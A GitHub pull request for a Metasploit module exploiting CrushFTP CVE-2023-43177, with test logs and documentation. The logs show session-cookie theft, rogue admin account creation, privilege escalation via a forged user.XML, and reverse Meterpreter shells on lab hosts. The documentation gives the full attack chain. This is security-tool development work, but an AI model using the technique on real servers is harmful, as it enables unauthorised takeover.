CrushFTP unauthenticated RCE (CVE-2023-43177) #18918
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
cdelafuente-r7
force-pushed
the
feat/mod/http/crushftp
branch
3 times, most recently
from
dd250a5 to
3ed1567
Compare
cdelafuente-r7
force-pushed
the
feat/mod/http/crushftp
branch
from
3ed1567 to
57a45a0
Compare
jheysel-r7
reviewed
Mar 28, 2024
There was a problem hiding this comment.
Great module @cdelafuente-r7. A very clean implementation of a complex exploit 👏 A couple minor nitpicks.
Testing went smoothly on both Windows and Linux. Testing the non-administrative user session on Linux took a couple tries because of a cached admin cookie although not a bad problem to have (the module wouldn't stop taking it's most efficient code path).
Windows
Admin User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Downloading the session file
[+] Session file downloaded
[*] Looking for the valid sessions
[*] Checking if user crushadmin is an admin (cookie: 1711571844199_Lom80xw3xbjL50Y7mBFI1mC1tK0v7k)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=993d861677, password=d44916df5c
[*] Uploading payload .jar file `5191.jar` to C:/Users/Public/5191.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_ff3f5f2020-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50421) at 2024-03-27 13:49:57 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/5191.jar' on the target
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
Non-privileged User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T`
[+] The target appears to be vulnerable.
[*] Downloading the session file
<redacted>
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711574716304_OxUot9xce5Ra0yd3rCY0LohgD2mkHK`
[*] Looking for the valid sessions
[*] Found 123 session cookies in the session file
[*] Cookie `1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5` is valid session (username: testuser)
[*] Cookie `1711573381058_LvTXbIZGcmx9qJ8tmiXmYxQb60dlRI` is not valid
<redacted>
[*] Cookie `1711574700714_5IFxQf2vgKr5tOGkKOdrUlpJjJQCZz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /testing
[*] Uploading the egg file `190438929f`
[*] Uploading `user.XML` to /testing/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
<redacted>
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b`
[*] Found the egg at FILE://C:/Users/msfuser/Desktop/testing/190438929f in the session file
[+] Found path `C:/Users/msfuser/Desktop/testing/` and it is Windows
[+] Found the file system path: C:/Users/msfuser/Desktop/testing/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX
[*] The forged user will be `5ef2802132`
[*] Moving user.XML from C:/Users/msfuser/Desktop/testing/ to `5ef2802132` home folder and elevate privileges
[*] Logging out session cookie `1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `5ef2802132` and password `c9f35fc21b`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711575332924_qI4Y5cdGLXWWGESFv0O37Xd3XLjcwc`
[+] Administrator account created: username=12d0ab650f, password=b4e7b73d9b
[*] [do_login] Logging in with username `12d0ab650f` and password `b4e7b73d9b`
[*] Uploading payload .jar file `143e.jar` to C:/Users/Public/143e.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711575333206_F4qLTAR1lf7aeqjUqxazbw6mcDcSrW`
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted C:/Users/msfuser/Desktop/testing/190438929f
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_27958456ca-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50703) at 2024-03-27 14:35:37 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/143e.jar' on the target
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
Linux
Admin User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA`
[*] Looking for the valid sessions
[*] Found 2 session cookies in the session file
[*] Cookie `1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO` is valid session (username: crushadmin)
[*] Cookie `1711577623584_vO7e9cCuVtVC6DQdtYwEdqvGthXYtW` is valid session (username: crushadmin)
[*] Checking if user crushadmin is an admin (cookie: 1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=0a9a861e09, password=9e6fb1989e
[*] [do_login] Logging in with username `0a9a861e09` and password `9e6fb1989e`
[*] Uploading payload .jar file `13a3.jar` to /var/tmp/13a3.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711578276318_D6ETTPhAHT1BtEOp0L6Fc8SPRC2HEV`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /var/tmp/13a3.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:39168) at 2024-03-27 15:24:08 -0700
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux 6.5.0-26-generic (amd64)
Architecture : x64
System Language : en_CA
Meterpreter : java/linux
meterpreter >
Non-privileged User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI`
[*] Looking for the valid sessions
[*] Found 0 session cookies in the session file
[*] No valid sessions found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO`
[*] Looking for the valid sessions
[*] Found 93 session cookies in the session file
[*] Cookie `1711643749455_SVZvsOplN6LhuTjYlZ8Py9CySaSLXS` is an anonymous session
[*] Cookie `1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj` is valid session (username: testuser)
[*] Cookie `1711579574357_zeud0fWqHSpBUzJA91u98rZrcaHfqy` is not valid
<redacted>
[*] Cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /Desktop
[*] Uploading the egg file `2638fb4da2`
[*] Uploading `user.XML` to /Desktop/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC`
<redacted>
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR`
[*] Found the egg at FILE://home/msfuser/Desktop/2638fb4da2 in the session file
[+] Found path `/home/msfuser/Desktop/` and it is Unix-like
[+] Found the file system path: /home/msfuser/Desktop/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au
[*] The forged user will be `db13909bb2`
[*] Moving user.XML from /home/msfuser/Desktop/ to `db13909bb2` home folder and elevate privileges
[*] Logging out session cookie `1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `db13909bb2` and password `ba82144d38`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711644456342_fguw9t7QiTEMnEZHjL56Z65ryFqt5j`
[+] Administrator account created: username=941449f87d, password=c90677b4b1
[*] [do_login] Logging in with username `941449f87d` and password `c90677b4b1`
[*] Uploading payload .jar file `49a4.jar` to /var/tmp/49a4.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711644456487_GXEtswO3Y70GSItRFaz4oCd5oZXjK0`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /home/msfuser/Desktop/2638fb4da2
[+] Deleted /var/tmp/49a4.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_53918e3561-js
[*] Meterpreter session 7 opened (172.16.199.1:4444 -> 172.16.199.132:34056) at 2024-03-28 09:47:08 -0700
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux 6.5.0-26-generic (amd64)
Architecture : x64
System Language : en_CA
Meterpreter : java/linux
meterpreter >
documentation/modules/exploit/multi/http/crushftp_rce_cve_2023_43177.md
Outdated
Show resolved
Hide resolved
| move_user_xml(admin_username, is_windows ? Regexp.last_match(:path) : path) | ||
|
|
||
| do_logout(cookie) | ||
| cookie = nil |
There was a problem hiding this comment.
Very minor but is setting cookie = nil here necessary? It's already been initialized in this context and on line 461 do_login is going to set cookie to either nil or the cookie found during authentication.
Suggested change
| cookie = nil |
There was a problem hiding this comment.
cookie is explicitly set to nil here to make sure the ensure block won't log it out again if the next call to do_login(admin_username, admin_password) raises an exception. Without this line, if do_login raises an exception, cookie will still contain the value of the previous session cookie, which should have been logged out at this point. The ensure block will try to logout the same session again.
I'll add a comment to explain this. Thank you for bringing this to my attention, I agree it is not clear in the code.
|
Thank you @jheysel-r7 for your review! I think I have addresses all your comments in the last commit. |
jheysel-r7
closed this pull request by merging all changes
into
rapid7:master
in
1174344
jheysel-r7
added
the
rn-modules
Release NotesThis exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.
It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.
Attack Details
The module will first get an anonymous session by querying an non-existing page and set a few session properties through specifically crafted HTTP headers. The
user_log_file,user_log_pathanduser_log_path_customproperties are set in a way that results in moving any file to any location on the server. This primitive is used to retrieve the CrushFTP cache session file (sessions.obj), which contains all the active session cookies.From there, the module will check if one of these session cookies belongs to an administrator and upload a payload (
.jarfile) to a temporary location on the server. It will then send a request to thetestDBAPI, specifying the path of the SQL driver pointing to the payload. This will result in the execution of the payload in the context of the user running CrushFTP, usually root on Linux or SYSTEM on Windows.In case no administrator sessions are found in the session file, the module will attempt to escalate privileges of any non-administrative sessions. It will abuse the fact that CrushFTP supports filesystem-based accounts, which are defined in folders containing a
user.XMLfile. This is done by taking advantage of the arbitrary file move primitive to upload and move a specifically crafteduser.XMLfile to the right location.Note that since the session cookies and other information are retrieved from the CrushFTP session file and because this file is created by the server every 10 minutes approximately, the module will attempt to download it repeatedly every 30 seconds by default (can be changed by setting the
SESSION_FILE_DELAYoption).More details on these techniques here.
Install CrushFTP
Download and follow the installation steps from the official website (https://www.crushftp.com/download.html).
Setup a new user to test the privilege escalation attack (optional)
This module can be tested with only an administrator logged into the application. To test the privilege escalation attack, a non-administrator user needs to be set up.
AdminandUser Management.+ Addbutton to create a new user (provide a username and a password).User Settingspane, select a location in the server file system that will be the root directory for this user. You can create a new folder by clicking the first button on the left hand side. Go ahead and create multiple subdirectories also.UploadandDeletepermissions on the right hand side.Save.Verification Steps
use multi/http/crushftp_rce_cve_2023_43177set target <target>set payload <payload>run rhosts=<target address>You will need to have an active user's session on the server. For this, you can log into the application with an administrator account or with a non-privileged user. The latter will trigger the privilege escalation routine.
Since the module needs to download the cache session file one or two times, depending on if privilege escalation is required, this can take up to 20 minutes to get remote code execution. So, make sure the user that is authenticated has not logged out or the session timed out until the exploit finishes.
Scenarios
Target 0 (Java) against CrushFTP version 10.5.0_3 on Windows
With an active administrator session
With an active non-privileged session (privilege escalation)
Target 0 (Java) against CrushFTP version 10.5.0_3 on Linux
With an active administrator session
With an active non-privileged session (privilege escalation)